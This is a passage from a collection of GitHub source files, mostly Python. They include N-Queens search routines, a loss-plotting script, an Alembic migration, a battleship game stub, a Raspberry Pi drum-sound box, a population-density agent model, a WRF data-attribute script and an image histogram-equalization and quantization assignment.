1\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef Astar(initial_state):\n heap = [(initial_state.heuristic() + initial_state.cost(), initial_state)]\n visited = set()\n steps = 0\n search_cost = 0\n max_fringe_size = 1\n\n while heap:\n _, state = heapq.heappop(heap)\n visited.add(state)\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited and successor_state not in [s for _, s in heap]:\n heapq.heappush(heap, (successor_state.heuristic() + successor_state.cost(), successor_state))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(heap))\n\n steps += 1\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef PrintBoard(queens):\n n = len(queens)\n for i in range(n):\n print(' ---' * n)\n for j in range(1, n + 1):\n p = 'Q' if queens[i] == j else ' '\n print('| %s ' % p, end='')\n print('|')\n print(' ---' * n)\n\ndef printinfo(steps, search_cost, max_fringe_size):\n print(\"Total number of steps to reach a solution (solution cost):\", steps)\n print(\"Total number of nodes generated before reaching a solution (search cost):\", search_cost)\n print(\"Maximum size of the frienge:\", max_fringe_size)\n","repo_name":"1hexk/N-Queen-Problem","sub_path":"N_queen_problem.py","file_name":"N_queen_problem.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7806140946","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2017-12-20\n@author: whenever77\nubuntu 14\n\n在训练过程中显示loss图像并进行保存\n\nloss文件格式如下(每行一个值):\n4.578215\n3.984914\n……\n3.718668\n\n使用以下命令运行:\npython show_loss.py '/home/data/pytorch_out/'\n\npng保存形式为 loss_month_day_hours_minutes.png\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport time\nimport sys\n\n\n# dir 为训练目录,即loss.txt所在目录,直接修改为所需路径即可\ndir = \"/home/data/pytorch_out/\"\n\n\n# 如读入有参数,即sys.argv[1]有值\nif len(sys.argv) >= 2:\n try:\n print(\"--------------------------------\")\n print(sys.argv[1].split('/')[-2])\n print(\"--------------------------------\")\n dir = sys.argv[1]\n except BaseException as e:\n print('error:\\t')\n print(e)\nelse:\n print(\"--------------------------------\")\n print(dir.split('/')[-2])\n print(\"--------------------------------\")\n\n\t\n\t\n# 读取loss的路径\npath = os.path.join(dir, 'loss.txt')\n\n# 利用时间作为画图后缀。可在训练过程中随时记录loss图像\ntime_tmp = list(time.localtime())[1:5]\ntime_now = \"_\".join(str(i) for i in time_tmp)\n\n# 如路径有误,print error\ntry:\n dataloss = np.loadtxt(path)\n plt.plot(dataloss)\n save_path = str(dir) + 'loss_' + str(time_now) + '.png'\n plt.savefig(save_path)\n plt.show()\nexcept BaseException as e:\n # print(\"--------------------------------\")\n print('error:\\t')\n print(e)\n\n","repo_name":"whenever77/Python-study","sub_path":"show_loss.py","file_name":"show_loss.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1900205692","text":"\"\"\"empty message\n\nRevision ID: 3a24472d1754\nRevises: 762402052503\nCreate Date: 2021-04-08 04:13:23.757308\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '3a24472d1754'\ndown_revision = '762402052503'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('personajes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('planetas',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('usuarios',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=120), nullable=False),\n sa.Column('last_name', sa.String(length=120), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=False),\n sa.Column('password', sa.String(length=80), nullable=False),\n sa.Column('is_active', sa.Boolean(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email')\n )\n op.create_table('favorites_characters',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('character_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['character_id'], ['personajes.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['usuarios.id'], )\n )\n op.create_table('favorites_planets',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('planet_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['planet_id'], ['planetas.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['usuarios.id'], )\n )\n op.drop_index('email', table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', mysql.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('email', mysql.VARCHAR(length=120), nullable=False),\n sa.Column('password', mysql.VARCHAR(length=80), nullable=False),\n sa.Column('is_active', mysql.TINYINT(display_width=1), autoincrement=False, nullable=False),\n sa.CheckConstraint('(`is_active` in (0,1))', name='user_chk_1'),\n sa.PrimaryKeyConstraint('id'),\n mysql_collate='utf8mb4_0900_ai_ci',\n mysql_default_charset='utf8mb4',\n mysql_engine='InnoDB'\n )\n op.create_index('email', 'user', ['email'], unique=True)\n op.drop_table('favorites_planets')\n op.drop_table('favorites_characters')\n op.drop_table('usuarios')\n op.drop_table('planetas')\n op.drop_table('personajes')\n # ### end Alembic commands ###\n","repo_name":"mzunigau/StarWarsAPI-Flask","sub_path":"migrations/versions/3a24472d1754_.py","file_name":"3a24472d1754_.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15457991132","text":"from random import randint\n\n\nuser_board = [[' '] * 8 for x in range(8)]\n\ncomputer_board = [[' '] * 8 for x in range(8)]\n\nletters_to_numbers = {\n 'A': 0,\n 'B': 1,\n 'C': 2,\n 'D': 3,\n 'E': 4,\n 'F': 5,\n 'G': 6,\n 'H': 7,\n}\n\ndef print_board(board):\n print('A B C D E F G H')\n print('----------------')\n row_number = 1\n for row in board:\n print(\"%d|%s|\" % (row_number, \"|\".join(row)))\n row_number += 1\n\ndef place_ships(board):\n for ship in range(8):\n ship_row, ship_column = randint(0, 7), randint(0, 7)\n while board[ship_row][ship_column] == 'x':\n ship_row, ship_column = randint(0, 7), randint(0, 7)\n board[ship_row][ship_column] = 'X'\n\ndef play_game():\n pass\n\ndef valid_coordinates():\n row = input(\"Enter the row of the ship: \").upper()\n while row not in \"12345678\":\n print(\"Please select a valid number between 1 and 8 inclusive\")\n row = input(\"Enter the row of the ship: \").upper()\n column = input(\"Enter the column of the ship: \").upper()\n while column not in \"ABCDEFGH\":\n print(\"Please choose a valud option between A and H inclusive\")\n column = input(\"Enter the column of the ship: \").upper()\n return int(row) - 1, letters_to_numbers[column]\n \ndef ships_sunk(board):\n count = 0\n for row in board:\n for column in row:\n if column == \"X\":\n count += 1\n return count\n\ndef new_game():\n pass\n\n\n","repo_name":"Johncci/battleship-down","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28300473465","text":"import pygame\nfrom gpiozero import Button, LEDBoard\nfrom signal import pause\n\npygame.init()\n\nbutton_1 = Button(14)\nbutton_2 = Button(18)\nbutton_3 = Button(9)\nbutton_4 = Button(10)\n\nled = LEDBoard(11,22,27,17)\n\n\nsound1 = pygame.mixer.Sound('samples/drum_tom_mid_hard.wav')\nsound2 = pygame.mixer.Sound('samples/drum_splash_hard.wav')\nsound3 = pygame.mixer.Sound('samples/drum_cowbell.wav')\nsound4 = pygame.mixer.Sound('samples/drum_cymbal_closed.wav')\n\n\nbutton_1.when_pressed = sound1.play\nbutton_2.when_pressed = sound2.play\nbutton_3.when_pressed = sound3.play\nbutton_4.when_pressed = sound4.play\n\ndef button_1_on() :\n led.value = (1,0,0,0)\n \ndef button_2_on() :\n led.value = (0,1,0,0)\n \ndef button_3_on() :\n led.value = (0,0,1,0)\n \ndef button_4_on() :\n led.value = (0,0,0,1)\n \n\nwhile True:\n if button_1.is_pressed:\n button_1_on()\n \n if button_2.is_pressed:\n button_2_on() \n \n if button_3.is_pressed:\n button_3_on()\n\n if button_4.is_pressed:\n button_4_on()\n","repo_name":"n3rdz/gpio-musicbox","sub_path":"musicbox.py","file_name":"musicbox.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18774615949","text":"import matplotlib.pyplot as plt\nimport json\nimport math\n\nimport matplotlib as mil\nmil.use('TkAgg')\n\n\nclass Agent:\n\n def __init__(self, position, **agent_attributes):\n self.position = position\n for attr_name, attr_value in agent_attributes.items():\n setattr(self, attr_name, attr_value)\n\n\nclass Position:\n def __init__(self, longitude_degrees, latitude_degrees):\n # We store the degree values, but we will be mostly using radians\n # because they are much more convenient for computation purposes.\n\n # assert : Lève une exception si renvoie False\n assert -180 <= longitude_degrees <= 180\n self.longitude_degrees = longitude_degrees\n\n assert -90 <= latitude_degrees <= 90\n self.latitude_degrees = latitude_degrees\n\n @property\n def longitude(self):\n # Longitude in radians\n return self.longitude_degrees * math.pi / 180\n\n @property\n def latitude(self):\n # Latitude in radians\n return self.latitude_degrees * math.pi / 180\n\n\nclass Zone:\n \"\"\"\n A rectangular geographic area bounded by two corners. The corners can\n be top-left and bottom right, or top-right and bottom-left so you should be\n careful when computing the distances between them.\n \"\"\"\n ZONES = []\n\n # Attributs de classe (constante si hors de la classe) car on fait cls.WIDTH_DEGREES\n MIN_LONGITUDE_DEGREES = -180\n MAX_LONGITUDE_DEGREES = 180\n MIN_LATITUDE_DEGREES = -90\n MAX_LATITUDE_DEGREES = 90\n WIDTH_DEGREES = 1 # degrees of longitude\n HEIGHT_DEGREES = 1 # degrees of\n EARTH_RADIUS_KILOMETERS = 6371\n\n # S'il y a un attribut d'instance, il va dans __init__\n def __init__(self, corner1, corner2):\n self.corner1 = corner1\n self.corner2 = corner2\n self.inhabitants = []\n\n @property\n def population(self):\n return len(self.inhabitants)\n\n @property\n def width(self):\n # Note that here we access the class attribute via \"self\" and it\n # doesn't make any difference\n return abs(self.corner1.longitude - self.corner2.longitude) * self.EARTH_RADIUS_KILOMETERS\n\n @property\n def height(self):\n return abs(self.corner1.latitude - self.corner2.latitude) * self.EARTH_RADIUS_KILOMETERS\n\n @property\n def area(self):\n return self.height * self.width\n\n def population_density(self):\n return self.population / self.area\n\n def average_agreeableness(self):\n if not self.inhabitants:\n return 0\n # agreeableness = []\n # for inhabitant in self.inhabitants:\n # agreeableness.append(inhabitant.agreableness)\n # return sum(agreeableness) / self.population\n return sum([inhabitant.agreeableness for inhabitant in self.inhabitants]) / self.population\n\n def add_inhabitant(self, inhabitant):\n self.inhabitants.append(inhabitant)\n\n def contains(self, position):\n \"\"\"Return True if the zone contains this position\"\"\"\n return position.longitude >= min(self.corner1.longitude, self.corner2.longitude) and \\\n position.longitude < max(self.corner1.longitude, self.corner2.longitude) and \\\n position.latitude >= min(self.corner1.latitude, self.corner2.latitude) and \\\n position.latitude < max(\n self.corner1.latitude, self.corner2.latitude)\n\n @classmethod\n def find_zone_that_contains(cls, position):\n if not cls.ZONES:\n # Initialize zones automatically if necessary\n cls._initialize_zones()\n\n # Compute the index in the ZONES array that contains the given position\n longitude_index = int(\n (position.longitude_degrees - cls.MIN_LONGITUDE_DEGREES) / cls.WIDTH_DEGREES)\n latitude_index = int(\n (position.latitude_degrees - cls.MIN_LATITUDE_DEGREES) / cls.HEIGHT_DEGREES)\n longitude_bins = int((cls.MAX_LONGITUDE_DEGREES -\n cls.MIN_LONGITUDE_DEGREES) / cls.WIDTH_DEGREES) # 180-(-180) / 1\n zone_index = latitude_index * longitude_bins + longitude_index\n\n # Just checking that the index is correct\n zone = cls.ZONES[zone_index]\n assert zone.contains(position)\n\n return zone\n\n @classmethod\n def _initialize_zones(cls):\n for latitude in range(cls.MIN_LATITUDE_DEGREES, cls.MAX_LATITUDE_DEGREES, cls.HEIGHT_DEGREES):\n for longitude in range(cls.MIN_LONGITUDE_DEGREES, cls.MAX_LONGITUDE_DEGREES, cls.WIDTH_DEGREES):\n bottom_left_corner = Position(longitude, latitude)\n top_right_corner = Position(\n longitude + cls.WIDTH_DEGREES, latitude + cls.HEIGHT_DEGREES)\n zone = Zone(bottom_left_corner, top_right_corner)\n cls.ZONES.append(zone)\n\n\nclass BaseGraph:\n\n def __init__(self):\n self.title = \"Your graph title\"\n self.x_label = \"X-axis label\"\n self.y_label = \"X-axis label\"\n self.show_grid = True\n\n def show(self, zones):\n # x_values = gather only x_values from our zones\n # y_values = gather only y_values from our zones\n x_values, y_values = self.xy_values(zones)\n plt.plot(x_values, y_values, '.')\n plt.xlabel(self.x_label)\n plt.ylabel(self.y_label)\n plt.title(self.title)\n plt.grid(self.show_grid)\n plt.show()\n\n def xy_values(self, zones):\n raise NotImplementedError\n\n\nclass AgreeablenessGraph(BaseGraph):\n\n def __init__(self):\n # Call base constructor\n super(AgreeablenessGraph, self).__init__()\n # super().__init__()\n self.title = \"Nice people live in the countryside\"\n self.x_label = \"population density\"\n self.y_label = \"agreeableness\"\n\n def xy_values(self, zones):\n x_values = [zone.population_density() for zone in zones]\n y_values = [zone.average_agreeableness() for zone in zones]\n return x_values, y_values\n\n\ndef main():\n # Zone.initialize_zones()\n for agent_attributes in json.load(open(\"agents-100k.json\")):\n latitude = agent_attributes.pop(\"latitude\")\n longitude = agent_attributes.pop(\"longitude\")\n position = Position(longitude, latitude)\n agent = Agent(position, **agent_attributes)\n # print(agent.agreeableness)\n zone = Zone.find_zone_that_contains(position)\n zone.add_inhabitant(agent)\n # print(\"Zone population: \", zone.population)\n # print(zone.average_agreeableness())\n\n agreeableness_graph = AgreeablenessGraph()\n agreeableness_graph.show(Zone.ZONES)\n\n\nmain()\n\n# agent = Agent(agent_attributes)\n# print(agent.agreeableness)\n# print(agent.neuroticism)\n","repo_name":"jlum85/POO-Python","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45923155735","text":"# get forecast_time attrs from dset to use in interpolation\ndef open_ds( fn, variable ):\n ''' cleanly read variable/close a single hourly netcdf '''\n import xarray as xr\n ds = xr.open_dataset( fn, autoclose=True )\n out = ds[ variable ].copy()\n ds.close()\n return out\ndef list_files( dirname ):\n '''\n list the files and split the filenames into their descriptor parts and \n return dataframe of elements and filename sorted by:['year', 'month', 'day', 'hour']\n '''\n import os\n import pandas as pd\n\n files = [ get_month_day( os.path.join(r, fn)) for r,s,files in os.walk( dirname ) \n for fn in files if os.path.split(r)[-1].isdigit() and fn.endswith( '.nc' )\n and '-*.nc' not in fn and 'old' not in r and 'test' not in r ]\n\n files_df = pd.DataFrame( files )\n return files_df.sort_values( ['year', 'month', 'day', 'hour'] ).reset_index()\ndef get_month_day( fn ):\n dirname, basename = os.path.split( fn )\n year, month, day_hour = basename.split('.')[-2].split('-')\n day, hour = day_hour.split( '_' )\n folder_year = dirname.split('/')[-1]\n return {'fn':fn, 'year':year, 'folder_year':folder_year,'month':month, 'day':day, 'hour':hour}\ndef get_forecast_time( fn ):\n return open_ds( fn, variable='PCPT' ).attrs['forecast_time']\ndef get_file_attrs( fn ):\n try:\n fn_args = get_month_day( fn )\n fn_args.update( forecast_time=get_forecast_time( fn ) )\n except:\n # if there is an issue... dont fail, do this...\n nodata = -9999\n fn_args = {'fn':fn, 'year':nodata, 'folder_year':nodata,'month':nodata, 'day':nodata, 'hour':nodata, 'forecast_time':nodata}\n return fn_args\n\nif __name__ == '__main__':\n import xarray as xr\n import pandas as pd\n import multiprocessing as mp\n import os\n \n # setup args\n # base_path = '/storage01/pbieniek/ccsm/hist/hourly'\n base_path = '/storage01/pbieniek/ccsm/rcp85/hourly'\n # base_path = '/storage01/pbieniek/erain/hourly'\n # base_path = '/storage01/rtladerjr/hourly'\n \n # fn_list = [ os.path.join( r, fn ) for r,s,files in os.walk( base_path ) \n # if 'oldstuff' not in r for fn in files if fn.endswith( '.nc' ) \n # and 'test' not in fn and '-*.nc' not in fn ]\n \n fn_list = list_files( base_path )\n # drop unneeded duplicates\n fn_list = fn_list[ fn_list.folder_year == fn_list.year ]\n print( 'number of files: {}'.format(len( fn_list )) )\n\n ncpus = 32\n output_path = '/workspace/Shared/Tech_Projects/wrf_data/project_data/wrf/docs'\n group = 'ccsm_rcp85'\n # group = 'erain'\n # group = 'gfdl_rcp85'\n\n pool = mp.Pool( ncpus )\n print( 'start multiprocessing' )\n out = [ pool.map( get_file_attrs, fnl['fn'] ) for group, fnl in fn_list.groupby( 'year' ) ]\n out = [ j for i in out for j in i ]\n print( 'multiprocessing complete' )\n pool.close()\n pool.join()\n\n print( 'df' )\n df = pd.DataFrame( out )\n output_filename = os.path.join( output_path, 'WRFDS_forecast_time_attr_{}.csv'.format( group ) )\n print( 'writing to disk' )\n df.to_csv( output_filename, sep=',' )\n","repo_name":"ua-snap/wrf_utils","sub_path":"archive/snap_wrf_data_prep/pipeline/get_date_forecast_time_from_raw_hourly.py","file_name":"get_date_forecast_time_from_raw_hourly.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"27583150160","text":"def get_and_strip_number(s):\n # replace this comment and the next statement with your function body\n return 0, ''\n\ndef get_and_strip_word(s):\n # replace this comment and the next statement with your function body\n return '', ''\n \ndef pad_words(s, num_words, final_len):\n if num_words <= 1: # best we can do is fill out the line with spaces\n return s + ((final_len - len(s))*' ')\n\n # there are at least 2 words, so at least one pigeon hole to fill (with spaces)\n num_pigeon_holes = num_words - 1 # the buckets (pigeon holes) are between words\n num_pigeons = final_len - (len(s) - num_pigeon_holes) # my pigeons are spaces\n pad_num = num_pigeons // num_pigeon_holes\n extra_num = num_pigeons % num_pigeon_holes # number of holes that get an extra pigeon\n working_str = ''\n \n # take care of the first num_pigeon_holes - extra_num holes\n for i in range(num_pigeon_holes - extra_num):\n word, s = get_and_strip_word(s)\n working_str += word + (pad_num * ' ') # insert pad_num spaces\n\n # take care of the last extra_num holes\n for i in range(extra_num):\n word, s = get_and_strip_word(s)\n working_str += word + ((pad_num + 1) * ' ')\n\n working_str += s\n return working_str\n\nsentence = \"This is a test.\"\nfilled_sentence = pad_words(sentence, 4, 20)\nprint(filled_sentence)\n\nfilled_sentence = pad_words(\"What?\", 1, 30)\nprint(filled_sentence)\n\nprint(pad_words(\"What's up?\", 2, 30))\n\n\n\n\n","repo_name":"Trent-Farley/All-Code","sub_path":"Python1/lab_4_files/python_tutor_exercise.py","file_name":"python_tutor_exercise.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"14803697131","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom skimage.color import rgb2gray\r\nimport skimage.color\r\nfrom imageio import imread\r\n\r\n# the matrix to transfer from rgb to yiq and vice versa\r\nCONSTANT_MATRIX = np.array([[0.299, 0.587, 0.114],\r\n [0.596, -0.275, -0.321],\r\n [0.212, -0.523, 0.311]])\r\n\r\n\r\ndef read_image(filename, representation):\r\n \"\"\"\r\n Gets a filename and an int representing which color image we want(greyscale or rgb)\r\n :param filename: A string\r\n :param representation: An int. 1 for greyscale and 2 for rgb\r\n :return: A matrix representing the image\r\n \"\"\"\r\n im = imread(filename)\r\n im_float = im.astype(np.float64)\r\n im_float /= 255\r\n if representation == 1 and len(im.T) == 3:\r\n return rgb2gray(im_float)\r\n\r\n else:\r\n return im_float\r\n\r\n\r\ndef imdisplay(filename, representation):\r\n \"\"\"\r\n Gets an image and shows it on the screen\r\n :param filename: A string ( name of the image)\r\n :param representation: An int. 1 for greyscale and 2 for rgb\r\n :return: None\r\n \"\"\"\r\n image = read_image(filename, representation)\r\n plt.imshow(image, cmap=plt.cm.gray)\r\n plt.axis('off')\r\n plt.show()\r\n\r\n\r\ndef rgb2yiq(imRGB):\r\n \"\"\"\r\n changing the color from rgb to yiq using\r\n the constant matrix I was given\r\n :param imRGB: A matrix that is shaped (x*y*3)\r\n :return: a yiq matrix\r\n \"\"\"\r\n return np.dot(imRGB, CONSTANT_MATRIX.T)\r\n\r\n\r\ndef yiq2rgb(imYIQ):\r\n \"\"\"\r\n changing the color from yiq to rgb using\r\n the constant matrix I was given\r\n :param imYIQ: A matrix that is shaped (x*y*3)\r\n :return: a rgb matrix\r\n \"\"\"\r\n\r\n return np.dot(imYIQ, (np.linalg.inv(CONSTANT_MATRIX)).T)\r\n\r\n\r\ndef histogram_image(image):\r\n \"\"\"\r\n This is the helper function for histogram equalizer that differentiates\r\n greyscale image from rgb\r\n :param image: A matrix representing the image\r\n :return: if the image is rgb then returns the histogram for y and True\r\n else returns the histogram for the picture and False\r\n \"\"\"\r\n is_rgb = False\r\n if len(image.T) == 3: # check to see if the image is rgb\r\n image = rgb2yiq(image)\r\n is_rgb = True\r\n\r\n original_hist = None\r\n if is_rgb:\r\n y = image[:, :, 0]\r\n y *= 255\r\n y = np.round(y)\r\n original_hist, axis = np.histogram(y, 256, (0, 255))\r\n\r\n if not is_rgb:\r\n image = (image*255).round().astype(np.uint8)\r\n original = image\r\n original_hist, axis = np.histogram(original, 256, (0, 255))\r\n\r\n return original_hist, is_rgb\r\n\r\n\r\ndef histogram_equalize(im_orig):\r\n \"\"\"\r\n Gets a Matrix of an image and equalizes the histogram\r\n :param im_orig: A matrix representing the image\r\n :return: The new equalized image, the original histogram, the new histogram\r\n \"\"\"\r\n original = im_orig.copy()\r\n original_hist, is_rgb = histogram_image(original)\r\n # if is_rgb:\r\n original = (original*255).round().astype(np.uint8)\r\n cumulative_hist = np.cumsum(original_hist)\r\n # find m (first grey scale that is non zero)\r\n non_zeroes = np.nonzero(cumulative_hist)\r\n m = non_zeroes[0][0]\r\n\r\n T = 255 * ((cumulative_hist - cumulative_hist[m]) / (cumulative_hist[-1] - cumulative_hist[m]))\r\n T = np.round(T)\r\n image = T[original.astype(np.uint8)]\r\n new_hist, bins = np.histogram(image, 256, (0, 255))\r\n image_float = image.astype(np.float64)\r\n image_float /= 255\r\n if is_rgb:\r\n original = rgb2yiq(im_orig)\r\n original[:, :, 0] = image_float[:, :, 0]\r\n return yiq2rgb(original), original_hist, new_hist\r\n\r\n else:\r\n return image_float, original_hist, new_hist\r\n\r\n\r\ndef quantize(im_orig, n_qaunt, n_iter):\r\n \"\"\"\r\n This function quantize a given image\r\n :param im_orig: The image in a matrix form\r\n :param n_qaunt: The number of colors we are given\r\n :param n_iter: The number of iterations we want\r\n :return: A tuple. The new image in a matrix form and the error rate of\r\n each iteration in an array.\r\n \"\"\"\r\n original = im_orig.copy()\r\n original_histogram, is_rgb = histogram_image(original)\r\n if is_rgb:\r\n original = np.floor(original * 255)\r\n error_list = []\r\n q_list = [0] * n_qaunt\r\n cumulative_hist = np.cumsum(original_histogram)\r\n\r\n z_list = [0] + [np.where(cumulative_hist >= i * (cumulative_hist[-1] / n_qaunt))[0][0]\r\n for i in range(1, n_qaunt)] + [255]\r\n\r\n for j in range(n_qaunt):\r\n lower_val = z_list[j] + 1\r\n upper_val = z_list[j + 1]\r\n g_val = np.arange(lower_val, upper_val + 1)\r\n q_list[j] = np.sum(g_val * original_histogram[lower_val: upper_val + 1]) / \\\r\n np.sum(original_histogram[lower_val: upper_val + 1])\r\n\r\n for i in range(n_iter):\r\n\r\n # compute the new z values\r\n temp_z = [0] + [(q_list[i-1] + q_list[i])/2 for i in range(1, n_qaunt)] + [255]\r\n\r\n # check z values\r\n if temp_z == z_list:\r\n break\r\n elif temp_z != z_list:\r\n z_list = temp_z\r\n # compute the new q values\r\n\r\n for j in range(n_qaunt):\r\n lower_val = int(z_list[j]) + 1\r\n upper_val = int(z_list[j + 1])\r\n g_val = np.arange(lower_val, upper_val + 1)\r\n q_list[j] = np.sum(g_val * original_histogram[lower_val: upper_val + 1]) /\\\r\n np.sum(original_histogram[lower_val: upper_val + 1])\r\n\r\n # compute the error value of this iteration\r\n error_rate = 0\r\n for k in range(n_qaunt):\r\n current_q = q_list[k]\r\n lower_val = int(z_list[k]) + 1\r\n upper_val = int(z_list[k + 1])\r\n g_values = np.arange(lower_val, upper_val+1)\r\n error_rate += np.sum(np.power(current_q-g_values, 2)*original_histogram[lower_val: upper_val + 1])\r\n\r\n error_list.append(error_rate)\r\n\r\n new_hist = np.array([0] * 256)\r\n\r\n for m in range(n_qaunt):\r\n lower_val = int(z_list[m])\r\n upper_val = int(z_list[m+1])\r\n new_hist[lower_val: upper_val+1] = np.floor(q_list[m])\r\n\r\n image = new_hist[original.astype(np.uint64)]\r\n\r\n image_float = image.astype(np.float64)\r\n image_float /= 255\r\n if is_rgb:\r\n im_orig = rgb2yiq(im_orig)\r\n im_orig[:, :, 0] = image_float[:, :, 0]\r\n return yiq2rgb(im_orig), error_list\r\n else:\r\n return image_float, error_list\r\n\r\n\r\nimages = []\r\njer_bw = read_image(r\"externals/jerusalem.jpg\", 1)\r\nimages.append((jer_bw, \"jerusalem grayscale\"))\r\njer_rgb = read_image(r\"externals/jerusalem.jpg\", 2)\r\nimages.append((jer_rgb, \"jerusalem RGB\"))\r\nlow_bw = read_image(r\"externals/low_contrast.jpg\", 1)\r\nimages.append((low_bw, \"low_contrast grayscale\"))\r\nlow_rgb = read_image(r\"externals/low_contrast.jpg\", 2)\r\nimages.append((low_rgb, \"low_contrast RGB\"))\r\nmonkey_bw = read_image(r\"externals/monkey.jpg\", 1)\r\nimages.append((monkey_bw, \"monkey grayscale\"))\r\nmonkey_rgb = read_image(r\"externals/monkey.jpg\", 2)\r\nimages.append((monkey_rgb, \"monkey RGB\"))\r\n\r\n\r\ndef test_rgb2yiq_and_yiq2rgb(im, name):\r\n \"\"\"\r\n Tests the rgb2yiq and yiq2rgb functions by comparing them to the built in ones in the skimage library.\r\n Allows error to magnitude of 1.e-3 (Difference from built in functions can't be bigger than 0.001).\r\n :param im: The image to test on.\r\n :param name: Name of image.\r\n :return: 1 on success, 0 on failure.\r\n \"\"\"\r\n imp = rgb2yiq(im)\r\n off = skimage.color.rgb2yiq(im)\r\n\r\n if not np.allclose(imp, off, atol=1.e-3):\r\n print(\"ERROR: in rgb2yiq on image '%s'\" % name)\r\n return 0\r\n imp2 = yiq2rgb(imp)\r\n off2 = skimage.color.yiq2rgb(off)\r\n if not np.allclose(imp2, off2, atol=1.e-3):\r\n print(\"ERROR: in yiq2rgb on image '%s'\" % name)\r\n return 0\r\n print(\"passed conversion test on '%s'\" % name)\r\n return 1\r\n\r\n\r\nfor im in images:\r\n if len(im[0].shape) == 3:\r\n result = test_rgb2yiq_and_yiq2rgb(im[0], im[1])\r\n if not result:\r\n print(\"=== Failed Conversion Test ===\")\r\n break\r\n\r\n\r\ndef display_all(im, add_bonus):\r\n if len(im.shape) == 3 and add_bonus:\r\n fig, a = plt.subplots(nrows=3, ncols=2)\r\n else:\r\n fig, a = plt.subplots(nrows=2, ncols=2)\r\n\r\n # adds the regular image\r\n a[0][0].imshow(im, cmap=plt.cm.gray)\r\n a[0][0].set_title(r\"original image\")\r\n\r\n # adds the quantified image\r\n quant = quantize(im, 3, 10)[0]\r\n a[0][1].imshow(quant, cmap=plt.cm.gray)\r\n a[0][1].set_title(r\"quantize to 3 levels, 10 iterations\")\r\n\r\n # adds the histogram equalized image\r\n hist = histogram_equalize(im)[0]\r\n a[1][0].imshow(hist, cmap=plt.cm.gray)\r\n a[1][0].set_title(\"histogram equalization\")\r\n\r\n # adds quantization on histogram equalized image\r\n hist_quant = quantize(hist, 6, 10)[0]\r\n a[1][1].imshow(hist_quant, cmap=plt.cm.gray)\r\n a[1][1].set_title(\"quantize on equalization\")\r\n\r\n # adds the bonus image\r\n # if len(im.shape) == 3 and add_bonus:\r\n # a[2][0].imshow(quantize_rgb(im, 3))\r\n # a[2][0].set_title(r\"bonus quantize_rgb\")\r\n\r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n for im in images:\r\n # change \"False\" to \"True\" if you wish to add the bonus task to the print\r\n display_all(im[0], False)\r\n # im = read_image(\"monkey.jpg\", 2)\r\n # yiq = rgb2yiq(im)\r\n # img = yiq2rgb(yiq)\r\n # x = np.hstack([np.repeat(np.arange(0, 50, 2), 10)[None, :], np.array([255] * 6)[None, :]])\r\n # x_normalize = x.astype(np.float64)\r\n # x_normalize /= 255\r\n # grad = np.tile(x_normalize, (256, 1))\r\n # result = histogram_equalize(grad)\r\n #\r\n # plt.imshow(result[0], cmap=plt.cm.gray)\r\n # plt.show()\r\n # after_quant = quantize(result[0], 5, 5)\r\n # # plt.show()\r\n # plt.imshow(after_quant[0], cmap=plt.cm.gray)\r\n # plt.show()\r\n # print(after_quant[1])\r\n # hist = histogram_image(after_quant[0])\r\n # print(hist[0])\r\n\r\n # imdisplay(\"monkey.jpg\", 2)\r\n # imdisplay(\"monkey.jpg\", 